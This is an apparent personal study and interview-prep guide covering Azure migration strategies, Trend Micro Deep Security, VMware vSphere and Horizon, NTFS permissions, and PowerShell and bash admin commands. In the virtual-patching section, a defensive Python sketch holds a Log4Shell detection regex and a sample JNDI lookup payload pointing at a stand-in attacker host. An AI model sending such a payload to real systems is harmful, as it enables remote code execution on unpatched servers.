Rehost = "Just pick it up and move it" (Lift and Shift)
Your on-prem VM running Windows Server with an app? Create an identical VM in Azure and copy everything over. Nothing changes about the software — you just moved where it lives. Like moving furniture to a new house without changing the furniture.

Real example: Old file server → Azure VM running same Windows Server, same shares, same everything. Users don't notice except the IP changed.

Why use it: Fastest. Lowest risk of breaking the app, because nothing about it changes. Good for the first wave of a migration when you just want stuff off old hardware quickly.

Replatform = "Move it, but swap one piece for a better version"
Move to the cloud, but take the opportunity to swap one component for a managed service. The app doesn't change — just one layer underneath it.

Real example: On-prem MySQL on a VM → Azure Database for MySQL. Your app connects to it the exact same way (same connection string format), but now Microsoft handles backups, patching, and high availability for the database engine automatically. You never touch the DB server again.

Why use it: Get managed service benefits (no maintenance) without rewriting anything.

Refactor = "Rebuild it the right way for the cloud"
Redesign the application to take real advantage of cloud features — containers, serverless, auto-scaling. Highest effort, highest long-term payoff.

Real example: A big monolithic app that runs on one huge server → break it into microservices running in containers on Kubernetes. Now it scales automatically to handle 10x traffic.

Note: This is usually a developer/architect decision, not a sysadmin task, but you need to know what it means when someone says it.

Repurchase = "Throw the old thing away and buy the cloud version"
Replace the on-prem software entirely with a SaaS product that does the same job.

Real example: Running Exchange Server on-prem → move everyone to Microsoft 365 Exchange Online. Done. No more Exchange Server to maintain. Same outcome for users, zero infrastructure to manage.

Another example you know: On-prem VDI infrastructure → Azure Virtual Desktop. Same concept.

Retire = "This thing doesn't need to exist anymore"
During discovery you find servers that are running but nobody is actually using. Orphaned test servers, old apps from a project three years ago that nobody decommissioned. Just turn them off.

Real example: Windows Server 2008 VM set up for a 2019 project, still running, nobody's touched it in two years. Power it off, wait 30 days, delete it.

Why it matters: Typically 10–30% of a portfolio can be retired. That's free money and reduced attack surface.

Retain = "Leave it alone for now"
Some stuff genuinely can't move yet — compliance requirement, specialized hardware dependency, just got a major upgrade last year so moving it now wastes the investment.

Real example: A legacy mainframe processing payroll. Too risky and complex to touch. Leave it on-prem, revisit next year.

Honest note: "Retain" is also sometimes code for "we don't have budget/time for this right now." That's valid — not everything needs to move immediately.

The 5 Phases — Plain English

Phase 1 — Discover & Assess: "What do we even have?"
Before moving anything, you have to know what's there. You run a tool (Azure Migrate) that scans your network and finds every server, VM, and database. It maps what talks to what — "this web server makes calls to that database server." That dependency map is critical: if you move the web server without the database, the app breaks on migration night.

Azure Migrate also watches actual CPU and RAM usage for 30 days and says: "This VM is spec'd for 16GB RAM but only ever uses 4GB — you can run it on a smaller (cheaper) Azure VM." That's how you right-size before spending money.
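The right-sizing logic described above comes down to "smallest size that covers observed peak usage plus some headroom". The sketch below shows that idea with a made-up size catalog and a 30% headroom factor; both are assumptions for illustration and do not reflect real Azure SKUs or how Azure Migrate actually scores sizes.

```python
# Hypothetical size catalog, ordered cheapest first: (name, vCPUs, RAM in GiB).
SIZES = [
    ("small", 2, 4),
    ("medium", 2, 8),
    ("large", 4, 16),
    ("xlarge", 8, 32),
]


def recommend_size(peak_vcpus_used: float, peak_ram_gib: float, headroom: float = 1.3):
    """Return the cheapest catalog size that covers observed peaks plus headroom."""
    need_cpu = peak_vcpus_used * headroom
    need_ram = peak_ram_gib * headroom
    for name, vcpus, ram_gib in SIZES:
        if vcpus >= need_cpu and ram_gib >= need_ram:
            return name
    return None  # nothing in the catalog is big enough


if __name__ == "__main__":
    # The VM from the text: provisioned with 16 GB but peaking at 4 GB.
    print(recommend_size(peak_vcpus_used=1.2, peak_ram_gib=4))
```

Sizing from measured peaks rather than from the provisioned spec is what lets the 16 GB on-prem VM land on a much smaller cloud size.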
Phase 2 — Plan & Design: "Set up Azure before anything moves"
Design the target environment first. What VNets and subnets? What NSG firewall rules? How does the VPN back to on-prem work? What's the naming convention? What tags go on everything for cost tracking?

Most importantly: set up Azure AD Connect now — so on-prem AD users can already authenticate to Azure resources before anything migrates. Identity has to work before apps do. No migration happens before the identity layer is confirmed working.
Phase 3 — Pilot: "Move one thing that doesn't matter, break it, learn from it"
Pick a non-critical server — a dev box, an internal test tool — something where if it breaks, nobody calls you at 2am. Migrate it completely end-to-end. See what breaks. Fix the process. Document it. Now you know what to expect before you touch production. Skipping the pilot is how you have a catastrophic migration night.
Phase 4 — Migrate: "Actually do the work, in waves"
Move workloads in groups (waves) based on dependencies — the web server and its database move together because they depend on each other.

For each workload: replicate the VM to Azure while it's still running on-prem (Azure Site Recovery does this continuously) → validate with a test failover → schedule a maintenance window → do the final sync → update DNS to the new Azure IP → cut over → verify everything works → leave old VM powered off (not deleted) for two weeks as rollback option → delete it once everyone's confident.
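Grouping workloads into waves by dependency is a connected-components problem: anything linked by a "talks to" relationship, directly or through another server, moves together. A minimal sketch, assuming the dependency map has already been reduced to pairs of server names (the names below are hypothetical):

```python
from collections import defaultdict


def plan_waves(servers, dependencies):
    """Group servers so that everything connected by a dependency is in the same wave."""
    graph = defaultdict(set)
    for a, b in dependencies:
        graph[a].add(b)
        graph[b].add(a)

    seen = set()
    waves = []
    for server in sorted(servers):
        if server in seen:
            continue
        # Walk every server reachable from this one through dependencies.
        group, stack = set(), [server]
        while stack:
            node = stack.pop()
            if node in group:
                continue
            group.add(node)
            stack.extend(graph[node] - group)
        seen |= group
        waves.append(sorted(group))
    return waves


if __name__ == "__main__":
    servers = ["web01", "db01", "file01", "app02", "db02"]
    dependencies = [("web01", "db01"), ("app02", "db02")]
    for number, wave in enumerate(plan_waves(servers, dependencies), start=1):
        print(f"Wave {number}: {', '.join(wave)}")
```

Servers with no dependencies end up in a wave of their own, which makes them natural candidates for the pilot.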
Phase 5 — Optimize: "Now make it not cost a fortune"
After everything's moved, look at what you're actually using. Right-size VMs that are over-provisioned. Buy Reserved Instances for things that run 24/7 (same VM, up to 60% cheaper on a 1- or 3-year commitment). Auto-shutdown dev VMs at 6pm. Move old backups and logs to cheaper blob storage tiers (Cool or Archive). This phase never really ends: cloud cost optimization is continuous, not a one-time event.
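The savings arithmetic behind those levers is simple enough to do on a whiteboard. A rough sketch, assuming a made-up rate of $0.20/hour, the common 730-hours-per-month billing approximation, and a dev VM that runs 08:00 to 18:00 on about 22 weekdays (the start time and weekday count are assumptions; only the 6pm shutdown and the "up to 60%" figure come from the text):

```python
HOURS_PER_MONTH = 730  # common billing approximation


def monthly_cost(hourly_rate, hours=HOURS_PER_MONTH, discount=0.0):
    """Monthly compute cost for a VM, optionally with a reservation discount."""
    return round(hourly_rate * hours * (1 - discount), 2)


rate = 0.20  # hypothetical pay-as-you-go rate in USD/hour

payg = monthly_cost(rate)                    # always on, no commitment
reserved = monthly_cost(rate, discount=0.60) # best-case reservation discount
dev = monthly_cost(rate, hours=10 * 22)      # 10 h/day on 22 weekdays

print(f"Pay-as-you-go 24/7: ${payg}")
print(f"Reserved 24/7:      ${reserved}")
print(f"Dev, auto-shutdown: ${dev}")
```

Disk and bandwidth charges are left out on purpose; a deallocated VM still pays for its managed disks.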

Azure Migrate — What It Actually Does

Free tool in the Azure portal. You download a small appliance (an OVA template for VMware, a VHD for Hyper-V) and deploy it on-prem. It discovers your environment, collects performance data (ideally for ~30 days), and sends it to Azure. You get:

  • List of every discovered VM with recommended Azure size and estimated monthly cost
  • Dependency maps — what server calls what
  • Readiness assessment — anything that would block migration
  • When ready: the migration tool in Azure Migrate (or Azure Site Recovery) handles continuous replication. Cutover = minutes of downtime, not hours.

Your Experience That Maps to All of This

You've touched migration at the operational level — own it:
Dell CloudSnapshot Manager (AWS) — managing backup policies for cloud resources = Phase 5 (protect and optimize what's in the cloud)
Azure Backup / Recovery Services Vault — same, Azure side
VMware Horizon VDI on Azure — operating a Replatform/Repurchase result. Someone migrated traditional desktop delivery to cloud-hosted VDI. You ran the resulting environment.
Azure AD / AD Connect — the identity layer that makes every migration work. You understand this cold.
Trend Micro Deep Security (CMS) — protecting 100+ hybrid cloud servers. This is the security layer that runs in parallel with migration — making sure servers are protected as they move to cloud. Cloud workload protection.

Honest interview framing: "I've operated in hybrid cloud environments that were the result of migration work — managed the identity layer, cloud backup/recovery, and server security across hybrid infrastructure. I understand the framework and the operational side deeply. I haven't led a greenfield lift-and-shift project, but I understand every phase of how it works."

Trend Micro Deep Security — Your Experience & What It Bridges

✅ Real experience at CMS — 100+ hybrid cloud servers. This is a significant security credential many sysadmins don't have.

What Trend Micro Deep Security Is

Trend Micro Deep Security is an enterprise cloud workload protection platform (CWPP) — a security agent installed on servers (Windows and Linux) that protects them from threats at the OS and network level. It runs on physical servers, VMs, and cloud instances (AWS EC2, Azure VMs).

Think of it as the security layer inside the server — complementing the network firewall (which sits outside). It watches what's happening on the host itself.

What Deep Security Does — Module by Module

Module | What it does | Plain English
Anti-Malware | Real-time malware scanning of files and processes. Signature + behavioral detection. | Antivirus for servers — catches malware before it runs or as it runs.
IDS/IPS (Intrusion Detection/Prevention) | Inspects network traffic going in/out of the host. Detects and blocks known attack patterns. | Watches network traffic at the server level. Blocks exploit attempts even if the OS patch isn't applied yet (virtual patching).
Integrity Monitoring | Watches files, directories, registry keys for unauthorized changes. Alerts when something unexpected is modified. | "Someone changed a config file or system binary that shouldn't have changed." Detects tampering.
Log Inspection | Collects and filters OS and app logs. Forwards security-relevant events to SIEM. Reduces noise. | Reads logs and surfaces the ones that matter for security — failed logons, privilege escalation, service changes.
Firewall | Host-based firewall on the server. Controls inbound/outbound traffic by rule at the OS level. | Extra firewall layer inside the server itself, independent of the network firewall.
Application Control | Whitelist what software is allowed to run on the server. Block everything else. | "Only our approved apps run here." Stops unauthorized software and ransomware from executing.
Virtual Patching | IPS rules that block exploitation of known vulnerabilities — even before the OS/app patch is applied. | Buys you time between when a CVE drops and when you can patch. The IPS rule blocks the exploit in transit.
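Integrity monitoring is the easiest module to explain with code: hash the files you care about, store that as a baseline, and compare later. The sketch below shows the general technique only; it is not how Deep Security implements it, and the function names are made up for the example.

```python
import hashlib
from pathlib import Path


def snapshot(paths):
    """Map each existing file path to its SHA-256 digest."""
    return {
        str(p): hashlib.sha256(Path(p).read_bytes()).hexdigest()
        for p in paths
        if Path(p).is_file()
    }


def changed_files(baseline, current):
    """Return paths that were modified, added, or removed since the baseline."""
    return sorted(
        path
        for path in baseline.keys() | current.keys()
        if baseline.get(path) != current.get(path)
    )


# Usage idea: take a baseline after a known-good build, re-run on a schedule.
# baseline = snapshot(["/etc/ssh/sshd_config", "/etc/passwd"])
# ...later...
# print(changed_files(baseline, snapshot(["/etc/ssh/sshd_config", "/etc/passwd"])))
```

A production tool also tracks permissions, ownership, and registry keys, and protects the baseline itself from tampering.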

Deep Security Manager vs Agent

Deep Security Manager (DSM) | Centralized management console — web UI where you manage policies, review alerts, assign protection modules to servers, and view dashboards. You administered this at CMS.
Deep Security Agent (DSA) | Lightweight agent installed inside each protected server. Enforces the policy assigned from DSM. Communicates back to DSM for reporting and policy updates.
Deep Security Virtual Appliance (DSVA) | For VMware environments — runs at the hypervisor level via VMware vShield/NSX. Protects VMs without an agent inside each VM. Agentless protection.
Policies | You create policies in DSM that define which modules are active and how they're configured. Assign a policy to a server or group of servers. Changes propagate automatically to all assigned agents.

What It Bridges In an Interview

They ask about... | Your Trend Micro bridge | Azure/Modern equivalent
Endpoint/server security | "At CMS I managed Trend Micro Deep Security protecting 100+ hybrid cloud servers — anti-malware, IDS/IPS, integrity monitoring, and log inspection across Windows and Linux." | Microsoft Defender for Servers / Defender for Endpoint
IDS/IPS | "Deep Security's IPS module — virtual patching protected servers against known CVEs while we worked through the patch cycle." | Azure Firewall Premium (IDPS), NSG Flow Logs, Defender for Cloud
Security monitoring / SIEM | "Deep Security's log inspection module collected and forwarded security events from 100+ servers — failed logons, file integrity alerts, privilege escalation — reducing noise before it reached the SIEM." | Azure Monitor / Log Analytics / Microsoft Sentinel
Compliance / hardening | "Deep Security's integrity monitoring gave us evidence that system files and configs hadn't been tampered with — important for HIPAA compliance on the CMS contract." | Defender for Cloud compliance reports, Azure Policy
Cloud workload protection | "Deep Security ran on both on-prem servers and AWS/Azure VMs — it's a CWPP. I've applied the same security posture across hybrid environments." | Microsoft Defender for Cloud (formerly Azure Security Center)

Interview Q&A — Trend Micro / Security

What security tools have you worked with at the server level?
At CMS I administered Trend Micro Deep Security Manager — a cloud workload protection platform protecting 100+ hybrid cloud servers across our federal healthcare infrastructure. I managed policies for anti-malware, IDS/IPS with virtual patching, integrity monitoring, and log inspection across Windows and Linux servers. The IPS virtual patching capability was particularly valuable in a federal environment — it let us maintain a security posture against known CVEs while we worked through the formal change management process required to apply actual patches. That experience translates directly to understanding what Microsoft Defender for Servers and Defender for Cloud are doing in Azure environments.
What is virtual patching and why does it matter?
Virtual patching is an IPS capability where the security tool applies a rule that blocks exploitation of a known vulnerability — even before you've actually patched the underlying software. When a critical CVE drops, there's always a window between disclosure and when patches are tested, approved, and deployed — especially in regulated environments with change management requirements. Virtual patching closes that window. Trend Micro Deep Security's IPS module inspects network traffic going to the server and drops any packet that matches the exploit pattern for that CVE. The vulnerability still exists in the software, but the attack can't reach it.
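To make the idea concrete: a virtual patch is essentially a traffic rule keyed to a CVE. The toy filter below is an assumption-heavy sketch, not Trend Micro's rule engine. It uses a single regular expression for the well-known Log4Shell lookup string (CVE-2021-44228), whereas real IPS rules parse protocols and handle obfuscation.

```python
import re

# Hypothetical rule set: CVE id -> pattern seen in exploit traffic.
RULES = {
    "CVE-2021-44228": re.compile(r"\$\{jndi:", re.IGNORECASE),  # Log4Shell lookup string
}


def inspect(payload, rules=RULES):
    """Return ('drop', cve) if the payload matches a rule, else ('allow', None)."""
    for cve, pattern in rules.items():
        if pattern.search(payload):
            return ("drop", cve)
    return ("allow", None)


print(inspect("GET /index.html HTTP/1.1"))
print(inspect("GET / HTTP/1.1\r\nUser-Agent: ${jndi:ldap://attacker.example/a}"))
```

The vulnerable library is still on the server in both cases; the rule only stops the exploit string from reaching it.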
✅ Deep real experience. ~1yr gap. The muscle memory is there — review the terminology tonight.

Keywords

vSphere · ESXi · vCenter (VCSA) · Cluster · Datacenter
vMotion · Storage vMotion · vHA · DRS · Fault Tolerance (FT)
VMDK · Snapshot · Template · OVF/OVA · Thin/Thick
Datastore · VMFS · NFS Datastore · vSAN
vSwitch · dvSwitch · Port Group · VMkernel Port · VLAN
Horizon · Connection Server · Desktop Pool · Instant Clone · DEM · App Volumes · Blast/PCoIP
VMware Tools · PowerCLI · esxtop · Resource Pool

Architecture Stack

Layer | Component | What it does
Hardware | Physical server (x86) | CPU, RAM, NICs, HBAs, local disks
Hypervisor | ESXi | Bare-metal hypervisor. Tiny footprint OS. VMs run on top.
Management | vCenter (VCSA) | Centralized management VM. Enables all advanced features — vMotion, HA, DRS. Without vCenter = per-host management only.
Platform | vSphere | Product suite name. ESXi + vCenter = vSphere.
Cluster | Cluster | Group of ESXi hosts managed together. Required for HA/DRS/vMotion.

Key Features Comparison

Feature | Trigger | Downtime? | Requires
vMotion | Admin-initiated — move running VM to another host | Zero | vCenter, shared storage, compatible CPUs
Storage vMotion | Admin-initiated — move VM's disks between datastores while running | Zero | vCenter
vHA | Automatic — host fails unexpectedly | ~5 min restart time | vCenter, cluster, 2+ hosts
DRS | Automatic — load balances VMs across hosts via vMotion | Zero (vMotion) | vCenter, cluster, shared storage
FT | Shadow VM runs lockstep — instantaneous takeover | Zero | Specific CPU/NIC, high overhead — critical VMs only

Storage — Provisioning & Datastores

Disk Provisioning Types

Type | Space Allocated | Zeroed | Performance | Best For
Thin | On demand — starts small, grows | On write | Slight overhead | Dev/test, storage-constrained
Thick Lazy Zeroed | Full space at creation | On first write | Good | General production
Thick Eager Zeroed | Full space at creation | At creation | Best — consistent | Databases, FT VMs, highest performance

Datastore Types

Type | Protocol | Notes
VMFS | Local / FC / iSCSI (block) | VMware's own FS. Multiple hosts can mount simultaneously. Most common for SAN.
NFS | NFS (file) | Mount NAS as datastore. Simple. Your EMC Isilon datastores at Disney were NFS.
vSAN | VMware software-defined | Pools ESXi host local disks into shared datastore. HCI — no external storage needed.
💡 Snapshots: take before a change, validate, delete within 24–48hrs. Delta files grow continuously and degrade performance. Long-running snapshots are a common datastore space problem. Never use as backup.
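The 24–48 hour rule is easy to enforce with a scheduled report. A minimal sketch of the age check, assuming snapshot records have already been exported (for example from PowerCLI to CSV) into dictionaries with `vm`, `name`, and `created` keys; those field names are an assumption for the example:

```python
from datetime import datetime, timedelta


def stale_snapshots(snapshots, now, max_age_hours=48):
    """Return (vm, name) pairs for snapshots older than max_age_hours."""
    cutoff = now - timedelta(hours=max_age_hours)
    return [(s["vm"], s["name"]) for s in snapshots if s["created"] < cutoff]


now = datetime(2024, 5, 10, 12, 0)
snaps = [
    {"vm": "WebServer01", "name": "Pre-Patch", "created": datetime(2024, 5, 7, 9, 0)},
    {"vm": "DB01", "name": "Pre-Upgrade", "created": datetime(2024, 5, 10, 8, 0)},
]
for vm, name in stale_snapshots(snaps, now):
    print(f"Delete or justify: {vm} / {name}")
```

Passing `now` in explicitly keeps the check testable and avoids surprises around time zones.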

Networking — vSwitch vs dvSwitch

Attribute | Standard vSwitch (VSS) | Distributed Switch (VDS)
Scope | Single ESXi host | Cluster-wide — multiple hosts
Managed from | Host directly | vCenter only
Config | Each host separately | Central — VMs keep settings when vMotioned
Enterprise features | Basic | LACP, NetFlow, port mirroring, NIOC

VMkernel Ports

Port Type | Traffic | Notes
Management | Host mgmt, SSH, vCenter comm | Required — configured first
vMotion | Live VM migration traffic | Dedicated NIC/VLAN recommended
vSAN | vSAN storage between hosts | Required for vSAN clusters
iSCSI | iSCSI SAN connectivity | For iSCSI-backed VMFS
NFS | NFS datastore connectivity | Used for Isilon NFS mounts
Fault Tolerance | FT logging — primary to shadow | Very low latency required

VMware Horizon VDI — Deep Dive

You ran 500+ concurrent Horizon sessions at CMS. This is your VDI story.

Architecture Components

Component | What it does | Your experience
Connection Server | Authentication broker. User connects here → gets directed to an available desktop from their pool. Runs on Windows Server. | Administered at CMS
Desktop Pool | Collection of VMs users can connect to. Can be dedicated (1 user always gets same VM) or floating (any available VM). | Managed pools at CMS
Instant Clone | VM "forked" from a running parent VM at login using vmFork. Provisioned in seconds. Stateless — wiped clean at logoff. Most scalable deployment type. | Configured at CMS
Linked Clone | Shares a base disk with parent, has own delta disk. Persistent — user's changes survive reboots. Slower to provision than instant clone. | Familiar
Full Clone | Complete independent copy of parent VM. Most storage, most flexibility. Used for long-term dedicated desktops. | Familiar
DEM (Dynamic Environment Manager) | Manages user profiles, folder redirection, app settings, env variables. Since instant clones are stateless (wiped at logoff), DEM is what saves the user's settings and data between sessions. | ✅ Configured at CMS
App Volumes | Application layering — apps packaged into virtual disks (AppStacks) attached to the VM at login. User gets their apps without them being installed in the master image. Fast app delivery. | Familiar
Unified Access Gateway (UAG) | Reverse proxy appliance in DMZ. External users connect to UAG — it authenticates and proxies traffic to internal Connection Server. Replaced Security Server. | Familiar

Display Protocols

Protocol | What it is | Best for
Blast Extreme | VMware's modern protocol. Uses H.264/HEVC encoding over TCP or UDP, and also works in a browser through HTML Access. Adaptive bitrate. | Most use cases — LAN and WAN. Default choice.
PCoIP | Teradici's protocol. Older, Horizon still supports it. Hardware-accelerated on Teradici devices. | Environments with existing PCoIP hardware
RDP | Standard Microsoft RDP. Fallback. | Basic/legacy access only

DEM — How It Works (Deep Dive)

DEM captures user environment settings and stores them in a network location (an SMB file share, optionally published through a DFS namespace). At login, DEM restores the user's settings to the session — even on an instant clone that has never seen that user before. At logoff, DEM saves any changes back to the store.

  • Folder Redirection — Desktop, Documents, AppData redirected to a network share. User's files follow them to any VDI session.
  • Application Config — DEM captures and restores per-app settings (browser bookmarks, Outlook profile, app preferences) using predefined templates or custom XML configs.
  • Environment Variables — Set per-user or per-group at login (drive mappings, printer assignments, PATH variables).
  • Privilege Elevation — DEM can grant specific apps elevated rights without making the user a local admin. FlexEngine is the client-side agent that applies DEM configs.
  • Predefined configs — DEM ships with predefined templates for common apps (Chrome, Firefox, Office apps). You customize and expand from there.
  • SmartPolicies — conditions-based policy application. Example: "If user is on VPN, disable USB redirection. If on LAN, allow it."

Horizon Interview Q&A

Walk me through your VDI experience with Horizon.
At CMS I managed a VMware Horizon environment with 500+ concurrent sessions on Azure — instant clone desktop pools for 2,000+ users. I configured DEM to handle profile management, folder redirection, and app settings since instant clones are stateless — DEM is what makes the user feel like they have a persistent desktop even though the underlying VM is destroyed at logoff. I managed the desktop pool lifecycle, troubleshot connection issues at the Connection Server level, and worked with Blast Extreme as the primary display protocol.
What's the difference between an instant clone and a full clone pool?
An instant clone is forked from a running parent VM at login — provisioned in seconds, stateless, and wiped at logoff. Very storage-efficient and scalable but you need DEM or folder redirection to persist user data. A full clone is an independent VM — it takes more time and storage to provision, but it's persistent and you don't need a separate profile solution. Instant clones are the right choice for a large, general-use workforce. Full clones for power users or specialized roles that need a dedicated machine.
Why is DEM important in an instant clone environment?
Instant clones are wiped at logoff — the VM that session ran on is destroyed. Without DEM, the user would lose everything: browser bookmarks, Outlook settings, app preferences, desktop files. DEM captures all of that to a network store during the session and restores it at next login — regardless of which clone the user lands on. Folder redirection handles the documents and desktop. DEM handles the application config and environment settings. Together they give users a persistent experience on a stateless infrastructure.
✅ Real, quantified. 85% ops reduction. Your top differentiator — lead with it in any interview.

Active Directory Cmdlets

# Users
Get-ADUser -Identity "rmartinez" -Properties *
Get-ADUser -Filter {Department -eq "IT"} | Select Name,SamAccountName
# -Enabled $true only takes effect when an initial password is supplied
New-ADUser -Name "John Doe" -SamAccountName "jdoe" -UserPrincipalName "jdoe@co.com" -AccountPassword (Read-Host -AsSecureString "Initial password") -Enabled $true -Path "OU=Users,DC=company,DC=com"
Set-ADUser -Identity "jdoe" -Department "Finance" -Title "Analyst"
Disable-ADAccount -Identity "jdoe"
Unlock-ADAccount -Identity "jdoe"
Set-ADAccountPassword -Identity "jdoe" -Reset -NewPassword (ConvertTo-SecureString "TempP@ss!" -AsPlainText -Force)
Remove-ADUser -Identity "jdoe" -Confirm:$false

# Groups
Add-ADGroupMember -Identity "VPN-Users" -Members "jdoe","jsmith"
Remove-ADGroupMember -Identity "VPN-Users" -Members "jdoe" -Confirm:$false
Get-ADGroupMember -Identity "Domain Admins" | Select Name

# Computers
Get-ADComputer -Filter {OperatingSystem -like "*Server*"} | Select Name,OperatingSystem
Move-ADObject -Identity "CN=PC01,CN=Computers,DC=co,DC=com" -TargetPath "OU=Workstations,DC=co,DC=com"

# AD Health
dcdiag /test:replications /v
repadmin /replsummary
repadmin /syncall /AdeP
netdom query fsmo

Azure — Az PowerShell Module

# Connect
Connect-AzAccount
Set-AzContext -SubscriptionId "xxxx-xxxx-xxxx"

# VM operations
Get-AzVM -ResourceGroupName "RG-Prod" | Select Name,Location
Get-AzVM -Status | Where {$_.PowerState -eq "VM deallocated"}   # stopped VMs = still paying for disks
Start-AzVM -ResourceGroupName "RG-Prod" -Name "VM-Web01"
Stop-AzVM -ResourceGroupName "RG-Prod" -Name "VM-Web01" -Force
Restart-AzVM -ResourceGroupName "RG-Prod" -Name "VM-Web01"
Get-AzVM -ResourceGroupName "RG-Dev" | Stop-AzVM -Force -NoWait   # bulk stop all in RG

# Resize
$vm = Get-AzVM -ResourceGroupName "RG-Prod" -Name "VM-Web01"
$vm.HardwareProfile.VmSize = "Standard_D4s_v3"
Update-AzVM -ResourceGroupName "RG-Prod" -VM $vm

# Networking / Cost
Get-AzNetworkSecurityGroup -ResourceGroupName "RG-Network"
Get-AzDisk | Where {$_.DiskState -eq "Unattached"}   # orphaned disks wasting money
Get-AzResource -TagName "Environment" -TagValue "Production"

VMware — PowerCLI

# Connect
Connect-VIServer -Server vcenter.company.local -Credential (Get-Credential)

# VM operations
Get-VM | Where {$_.PowerState -eq "PoweredOff"} | Select Name,ResourcePool
Start-VM -VM "WebServer01" -Confirm:$false
Stop-VMGuest -VM "WebServer01" -Confirm:$false   # graceful shutdown via VMware Tools
Set-VM -VM "WebServer01" -NumCPU 4 -MemoryGB 16 -Confirm:$false

# Snapshots
Get-VM | Get-Snapshot | Select VM,Name,Created,@{N="SizeGB";E={[math]::Round($_.SizeMB/1024,2)}}
Get-VM | Get-Snapshot | Where {$_.Created -lt (Get-Date).AddDays(-3)} | Select VM,Name,Created   # older than 3 days
# -Quiesce and -Memory are switch parameters, so use the colon form to pass a value
New-Snapshot -VM "WebServer01" -Name "Pre-Patch-$(Get-Date -Format yyyyMMdd)" -Quiesce -Memory:$false
Remove-Snapshot -Snapshot (Get-VM "WebServer01" | Get-Snapshot -Name "Pre-Patch*") -Confirm:$false

# vMotion / Migration
Move-VM -VM "WebServer01" -Destination (Get-VMHost "esxi02.company.local") -Confirm:$false
Move-VM -VM "WebServer01" -Datastore (Get-Datastore "DS-SSD-01")   # Storage vMotion

# Host / Reporting
Get-VMHost | Select Name,ConnectionState,@{N="CPU%";E={[math]::Round($_.CpuUsageMhz/$_.CpuTotalMhz*100,1)}}
Set-VMHost -VMHost "esxi01.company.local" -State Maintenance
Get-VM | Select Name,NumCPU,MemoryGB,PowerState | Export-Csv "vm-inventory.csv" -NoTypeInformation

Windows Server — General Commands

# Services / Processes
Get-Service | Where {$_.Status -eq "Stopped" -and $_.StartType -eq "Automatic"}
Restart-Service -Name "Spooler" -Force
Get-Process | Sort CPU -Descending | Select -First 10 Name,CPU,WorkingSet

# Disk / Volumes
Get-Volume | Where {($_.SizeRemaining/$_.Size) -lt 0.10} | Select DriveLetter,@{N="Free%";E={[math]::Round($_.SizeRemaining/$_.Size*100,1)}}
Get-Disk ; Get-Partition -DiskNumber 1

# Network
Test-NetConnection -ComputerName "server01" -Port 443
Get-NetIPAddress | Where {$_.AddressFamily -eq "IPv4"} | Select IPAddress,InterfaceAlias
Resolve-DnsName "server01.company.com"
netstat -ano | findstr :3389

# Remote execution
Invoke-Command -ComputerName "Server01","Server02" -ScriptBlock { Get-Service "W32Time" }
Enter-PSSession -ComputerName "Server01"

# Event logs — key security event IDs
Get-WinEvent -FilterHashtable @{LogName="Security";Id=4625} -MaxEvents 20   # failed logons
Get-WinEvent -FilterHashtable @{LogName="Security";Id=4740} -MaxEvents 10   # account lockouts
Get-WinEvent -FilterHashtable @{LogName="Security";Id=4728} -MaxEvents 10   # added to security group
Get-WinEvent -FilterHashtable @{LogName="Security";Id=4648} -MaxEvents 10   # explicit credential logon

# GPO / time
gpupdate /force ; gpresult /r
w32tm /query /status ; w32tm /resync
whoami /all   # user + all groups + privileges

Bash — Linux Commands

# System
top ; htop ; uptime ; uname -r ; lscpu
df -h ; du -sh /var/log/* ; free -h

# Services
systemctl status nginx ; systemctl restart nginx ; systemctl enable nginx
journalctl -u nginx -n 50 ; journalctl -f

# Network
ip addr show ; ip route show
ss -tulnp   # listening ports + what's using them
curl -I https://google.com
nslookup server01.company.com
dig @192.168.1.10 server01.company.com

# Files / Permissions
ls -lah ; chmod 755 script.sh ; chown rudy:rudy file.txt
find /var/log -name "*.log" -mtime +30 -delete   # scoped to /var/log, never /; swap -delete for -print to preview
tail -f /var/log/syslog ; grep -r "error" /var/log/

# Users
id username ; last | head -20 ; who
passwd username ; usermod -aG sudo username

# BigFix agent
service besclient status
/opt/BESClient/bin/BESClient -register

Filesystems — Windows

Filesystem | Max File Size | Max Volume | Use Case & Key Facts
NTFS | 16 TB | 256 TB | Standard for all Windows servers and workstations. Supports permissions (ACLs), encryption (EFS), compression, quotas, journaling (recovers from crashes), symbolic links, alternate data streams. You live here.
ReFS (Resilient FS) | 16 EB | 4.7 EB | Designed for large data, storage spaces, Hyper-V VHDs. Self-healing — detects/corrects corruption automatically. Does NOT support: boot volumes, EFS encryption, NTFS compression, dedup on some versions. Server 2012+
FAT32 | 4 GB | 2 TB | Legacy. USB drives, removable media, boot partitions for EFI. No permissions. No journaling. Can't store files over 4GB — common pain point for large ISOs.
exFAT | 128 PB | 128 PB | Modern replacement for FAT32 on removable media. Large files OK. No permissions. Cross-platform (Windows/Mac/Linux). USB drives, SD cards.

NTFS Permissions — Know These

Permission | What it allows
Full Control | Read, write, modify, delete, change permissions, take ownership
Modify | Read, write, delete files/folders — cannot change permissions
Read & Execute | View and run files — cannot modify
Read | View file contents and attributes only
Write | Create files and folders, modify content — cannot delete
List Folder Contents | View the names of files and subfolders inside a folder. Applies to folders only and is not inherited by files.
  • Inheritance — permissions flow down from parent folders. You can break inheritance on a child folder to assign unique permissions.
  • Effective Permissions — the combined result of NTFS + Share permissions. The more restrictive of the two applies when accessing over network.
  • Deny overrides Allow — if a user has Allow Read but is in a group with Deny Read, Deny wins.
  • NTFS vs Share Permissions — Share permissions only apply over the network. NTFS apply locally AND over network. Best practice: Share = Full Control to Everyone, lock down with NTFS only.
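The "more restrictive wins over the network" rule can be modeled as taking the minimum of two ranked levels. This sketch is deliberately simplified: real ACLs are sets of individual rights, not a ladder, and the mapping of share-level Change to NTFS Modify is an approximation chosen for the example.

```python
# Simplified ladder, least to most access.
RANK = {"None": 0, "Read": 1, "Modify": 2, "Full Control": 3}

# Share permissions use Read / Change / Full Control; map them onto the ladder.
SHARE_TO_COMMON = {"Read": "Read", "Change": "Modify", "Full Control": "Full Control"}


def effective_access(share_perm, ntfs_perm, over_network=True):
    """Return the access a user ends up with for a given share + NTFS combination."""
    if not over_network:
        return ntfs_perm  # share permissions are not evaluated for local access
    share_equiv = SHARE_TO_COMMON[share_perm]
    return min(share_equiv, ntfs_perm, key=RANK.__getitem__)


print(effective_access("Full Control", "Modify"))                      # best-practice setup
print(effective_access("Read", "Full Control"))                        # share is the bottleneck
print(effective_access("Read", "Full Control", over_network=False))    # logged on locally
```

This is why the best practice works: with the share wide open, NTFS is always the more restrictive side, so there is only one place to manage access.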

Filesystems — Linux

Filesystem | Notes | Common Use
ext4 | Default for most Linux distros. Journaling, mature, stable. Max file 16TB, max volume 1EB. | Root partition, most Linux servers
